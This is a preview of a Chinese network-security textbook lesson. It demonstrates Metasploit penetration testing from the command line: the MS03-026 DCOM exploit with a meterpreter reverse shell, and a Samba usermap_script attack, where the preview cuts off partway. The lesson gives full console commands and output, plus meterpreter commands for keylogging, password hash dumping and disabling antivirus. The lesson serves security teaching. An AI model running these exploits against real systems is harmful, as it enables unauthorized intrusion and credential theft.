《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试_第1页
《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试_第2页
《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试_第3页
《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试_第4页
《计算机网络安全防护技术(第二版)》 课件 第6章 任务6.4.2 通过命令行界面对服务器实施渗透测试_第5页
已阅读5页,还剩14页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第6章

网络安全渗透测试技术编著:

秦燊劳翠金

任务6.4.2通过命令行界面对服务器实施渗透测试

任务6.4.2通过命令行界面对服务器实施渗透测试

除了图形界面,还可使用命令行界面的Metasploit框架版(TheMetasploitFramework,简称MSF),Metasploit框架版可以针对目标的漏洞,提供相应的发射器和恶意代码。攻击者采用发射器,可将恶意代码发射到目标主机上并隐蔽起来,恶意代码可接受攻击者的控制。一、Metasploit涉及的一些概念vulnerability:被攻击主机上的漏洞、薄弱点。exploit:用于发射恶意代码的发射器。利用被攻击者的漏洞和弱点,发射器可将木马等恶意代码植入到被攻击者主机。payload:是攻击者用发射器发射并隐藏到被攻击者主机内恶意代码,如木马等。利用被攻击者主机上的漏洞,攻击者可使用exploit发射器发射恶意代码payload,将恶意代码payload发射到攻击者的主机,隐蔽的植入到被攻击者主机内部。Metasploit拥有大量优秀的、在线更新的exploit和paylaod。其中,Meterpreter是众多载荷中最受欢迎的payload。二、Metasploit框架结构MSF的操作步骤。一)针对被攻击者主机的漏洞,选择用于发射恶意代码的发射器exploit。1.search:查看可用的发射器exploits。2.use:选用合适的发射器exploits。二)选用攻击载荷payload(如木马等恶意代码),并设置相关参数。1.showpayloads:查看所有可选的攻击载荷(恶意代码)。2.setpayload:从大量的攻击载荷payloads中,选择一个,一般选用Meterpreter作为攻击载荷。3.showoptions:查看攻击载荷的配置选项。4.set:设置攻击载荷的配置选项、设置相关参数。三)查看适用的操作系统1.showtargets:查看所选的发射器和攻击载荷适用的操作系统及版本,如果与被攻击者的不符,则无法实施攻击。2.settarget设置攻击的操作系统。四)实施攻击exploit:使用选好的发射器exploit和攻击载荷payload,执行渗透测试攻击,效果和run一样。参数–j表示攻击在后台进行。以上是完整的步骤,根据实际情况,操作中可以省去其中某些步骤。三、攻击载荷Meterpreter常用命令Meterpreter是最常用的攻击载荷,其常用的命令如下:1.background回到后台,即上一个命令提示符。2.sessions每个攻击为一个会话,每个会话有一个唯一的ID,使用sessions命令可查看当前有哪些会话,即有哪些主机被控制了。使用session-h命令可查看帮助信息。使用sessionsID命令可切换到指定的session会话。使用session-kID命令可关闭指定的session会话。3.screenshot对被攻击主机截屏,保存到本地。4.sysinfo显示被攻击主机的系统信息。5.ps查看被攻击主机正在运行的进程。6.migrate将meterpreter迁移到相对稳定的进程中。7.runkeylogrecorder键盘记录8.runhashdump收集被攻击者主机的密码哈希值9.runvnc打开被攻击者主机的桌面10.runkillav关闭被攻击者主机的杀毒软件。四、对Windows服务器实施MS03-026漏洞攻击上一小节,我们通过Nessus扫描到了Windows服务器存在MS03-026漏洞。下面学习如何针对该已知漏洞,用命令行界面对目标系统实施渗透测试攻击。1.打开命令行界面,输入msfconsole命令。root@kali:~/Downloads#msfconsole2.输入searchms03-026命令,查找针对漏洞ms03-026的exploit发射器。msf>searchms03-026[!]Moduledatabasecachenotbuiltyet,usingslowsearchMatchingModules================NameDisclosureDateRankDescription-----------------------------------exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow查找到针对该漏洞的发射器:exploit/windows/dcerpc/ms03_026_dcom3.通过useexploit/windows/dcerpc/ms03_026_dcom命令,选用该exploit发射器。msf>useexploit/windows/dcerpc/ms03_026_dcom4.通过showpayloads命令,查看所有可选的攻击载荷payload(恶意代码)。msfexploit(windows/dcerpc/ms03_026_dcom)>showpayloads可以看到,可用的payload攻击载荷很多。其中,windows/meterpreter/bind_tcp是kali主动联系被攻击者,如果要经过防火墙,易被过滤掉,不容易成功;我们将采用windows/meterpreter/reverse_tcp,此时,受害者将主动联系kali,防火墙一般会放行。5.将“windows/meterpreter/reverse_tcp”选为攻击载荷。msfexploit(windows/dcerpc/ms03_026_dcom)>setpayloadwindows/meterpreter/reverse_tcppayload=>windows/meterpreter/reverse_tcp6.通过showoptions命令,查看攻击载荷payload的配置选项。msfexploit(windows/dcerpc/ms03_026_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT135yesThetargetport(TCP)Payloadoptions(windows/meterpreter/reverse_tcp):NameCurrentSettingRequiredDescription--------------------------------------EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none)LHOSTyesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal7.set:设置攻击载荷的配置选项、设置相关参数。msfexploit(windows/dcerpc/ms03_026_dcom)>setrhost3rhost=>3msfexploit(windows/dcerpc/ms03_026_dcom)>setlhost1lhost=>1三)查看适用的操作系统1.showtargets:查看所选的发射器和攻击载荷适用的操作系统及版本,如果与被攻击者的不符,则无法实施攻击。msfexploit(windows/dcerpc/ms03_026_dcom)>showtargetsExploittargets:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal可见,ID号为0的target,适用的目标操作系统及版本为WindowsNTSP3-6a/2000/XP/2003Universal。2.选用目标操作系统对应的ID号为0。msfexploit(windows/dcerpc/ms03_026_dcom)>settarget0target=>0四)实施攻击1.exploit:使用选好的发射器exploit和攻击载荷payload,执行渗透测试攻击。msfexploit(windows/dcerpc/ms03_026_dcom)>exploit[*]StartedreverseTCPhandleron1:4444[*]3:135-TryingtargetWindowsNTSP3-6a/2000/XP/2003Universal...[*]3:135-Bindingto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Boundto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Sendingexploit...[*]Sendingstage(179779bytes)to3[*]Sleepingbeforehandlingstage...[*]Meterpretersession1opened(1:4444->3:3177)at2018-12-3020:26:40-0500meterpreter>可以看到,攻击成功,payload被发射到目标系统中。五)操控被攻击服务器1.查看被攻击服务器的信息meterpreter>sysinfoComputer:ROOT-TVI862UBEHOS:Windows.NETServer(Build3790).Architecture:x86SystemLanguage:en_USDomain:WORKGROUPLoggedOnUsers:2Meterpreter:x86/windows2.进入被攻击服务器的命令行界面meterpreter>shellProcess2396created.Channel1created.MicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp.3.执行命令,操控被攻击主机,如执行ipconfig等命令。C:\WINDOWS\system32>ipconfigipconfigWindowsIPConfigurationEthernetadapterLocalAreaConnection:Connection-specificDNSSuffix.:IPAddress............:3SubnetMask...........:DefaultGateway.........:C:\WINDOWS\system32>4.退出被攻击主机的命令行界面C:\WINDOWS\system32>^CTerminatechannel1?[y/N]ymeterpreter>5.执行backgroud命令,回到后台,即上一个命令提示符。meterpreter>background[*]Backgroundingsession1...6.查看当前sessions会话msfexploit(windows/dcerpc/ms03_026_dcom)>sessionsActivesessions===============IdNameTypeInformationConnection-------------------------------1meterpreterx86/windowsNTAUTHORITY\SYSTEM@ROOT-TVI862UBEH1:4444->3:3177(3)可以看到,目前只有一个会话,ID是1,被控制的目标服务器是3。五、对Linux服务器实施samba漏洞攻击1.打开命令行界面,输入msfconsole命令。root@kali:~#msfconsole2.使用search命令从metasploit的渗透代码库中查找攻击samba服务的exploit发射器。msf>searchsambaMatchingModules================NameDisclosureDateRankDescription----------------------------------……省略部分输出……exploit/multi/samba/usermap_script2007-05-14excellentSamba"usernamemapscript"CommandExecution……省略部分输出……我们从显示的结果中,选择exploit/multi/samba/usermap_script作为发射器。3.通过useexploit/multi/samba/usermap_script命令,选用该exploit发射器。msf>useexploit/multi/samba/usermap_scriptmsfexploit(multi/samba/usermap_script)>4.通过showpayloads命令,查看所有可选的攻击载荷payload(恶意代码)。msfexploit(multi/samba/usermap_script)>showpayloads在列出的众多攻击载荷中,我们选择cmd/unix/bind_netcat。5.将“cmd/unix/bind_netcat”选为攻击载荷。msfexploit(multi/samba/usermap_script)>setpayloadcmd/unix/bind_netcatpayload=>cmd/unix/bind_netcat6.通过showoptions命令,查看攻击载荷(payload)的配置选项。msfexploit(multi/samba/usermap_script)>showoptionsModuleoptions(exploit/multi/samba/usermap_script):NameCurrentSettingRequiredDescription-----------------------------------

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论